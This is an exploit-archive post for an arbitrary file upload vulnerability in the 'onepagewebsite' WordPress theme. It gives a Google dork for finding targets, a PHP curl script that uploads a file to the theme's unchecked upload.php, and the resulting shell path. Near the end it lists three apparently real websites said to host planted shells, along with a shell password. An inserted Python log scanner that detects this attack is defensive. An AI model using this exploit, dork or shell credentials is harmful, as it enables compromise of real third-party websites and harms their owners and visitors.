
Wordpress Themes - onepagewebsite Arbitrary File Upload Vulnerability

Author: Zikou-16 , Published: 29-11-2012
--------------------------------------------------------------------------------

######################################################################################
#
# Author => Zikou-16
#
# Facebook => http://fb.me/Zikou.se
#
# Google Dork => inurl:"wp-content/themes/onepagewebsite"
#
#######################################################################################

---------------------------------------------------------------------------------------

Exploit : uploadshell.php

<?php

$uploadfile = "dz.php";   // local file to upload (the phpinfo() test file shown below)

// The theme's upload handler takes the destination directory from the ?folder= query
// parameter and stores the 'Filedata' multipart field there without checking the file type.
$ch = curl_init("http://www.localhost/wp-content/themes/onepagewebsite/uploads/upload.php?folder=/wp-content/themes/onepagewebsite/uploads/uploads/");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata' => "@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>


Shell Access : http://www.localhost/wp-content/themes/onepagewebsite/uploads/uploads/dz.php

dz.php
<?php
phpinfo();
?>
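Detection logic for this pattern, as an added example that is not part of the advisory: it parses Apache combined-format access-log lines (the sample lines are constructed) and flags POSTs to the theme's upload.php as well as any request for a .php file under its uploads/uploads/ directory, which should only ever hold static uploads.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache "combined" log format: ip ident user [ts] "METHOD url proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Paths taken from the advisory; a site installed in a subdirectory still matches.
UPLOADER_PATH = "/wp-content/themes/onepagewebsite/uploads/upload.php"
SHELL_DIR = "/wp-content/themes/onepagewebsite/uploads/uploads/"


def classify(line):
    """Return a finding string for a suspicious log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("url"))
    path, query = parts.path, parse_qs(parts.query)
    method, status, ip = m.group("method"), m.group("status"), m.group("ip")
    if method == "POST" and path.endswith(UPLOADER_PATH):
        # Any POST to the uploader is worth a look; a caller-chosen folder= is the abuse pattern.
        folder = query.get("folder", [""])[0]
        return f"upload.php POST from {ip} (folder={folder!r}, status {status})"
    if SHELL_DIR in path and path.lower().endswith(".php"):
        # PHP being requested from the uploads directory is a web-shell indicator.
        return f"PHP requested under theme uploads dir from {ip}: {path}"
    return None


def scan(lines):
    """Run classify() over an iterable of log lines and keep the findings."""
    return [f for f in (classify(l) for l in lines) if f]


# Constructed sample log: a normal page view, the upload, the shell request, a benign image.
SAMPLE_LOG = [
    '203.0.113.5 - - [29/Nov/2012:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120',
    '203.0.113.5 - - [29/Nov/2012:10:00:07 +0000] "POST /wp-content/themes/onepagewebsite/uploads/upload.php?folder=/wp-content/themes/onepagewebsite/uploads/uploads/ HTTP/1.1" 200 45',
    '203.0.113.5 - - [29/Nov/2012:10:00:09 +0000] "GET /wp-content/themes/onepagewebsite/uploads/uploads/dz.php HTTP/1.1" 200 31337',
    '198.51.100.9 - - [29/Nov/2012:10:01:00 +0000] "GET /wp-content/themes/onepagewebsite/uploads/uploads/banner.jpg HTTP/1.1" 200 8192',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Beyond alerting, the same directory should be denied PHP execution at the web-server level so that an uploaded .php file is served as text rather than run.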


---------------------------------------------------------------------------------------

Demo :

1) http://www.simpleonlinestrategies.com.au/wp-content/themes/onepagewebsite/uploads/uploads/x.php

2) http://bizbeknown.com/wp-content/themes/onepagewebsite/uploads/uploads/x.php

3) http://www.cheapfurnitureremovals.net.au/wp-content/themes/onepagewebsite/uploads/uploads/x.php

_____________________
Shell password => dz0
_____________________
-----------------------------------------------------------------------------------------
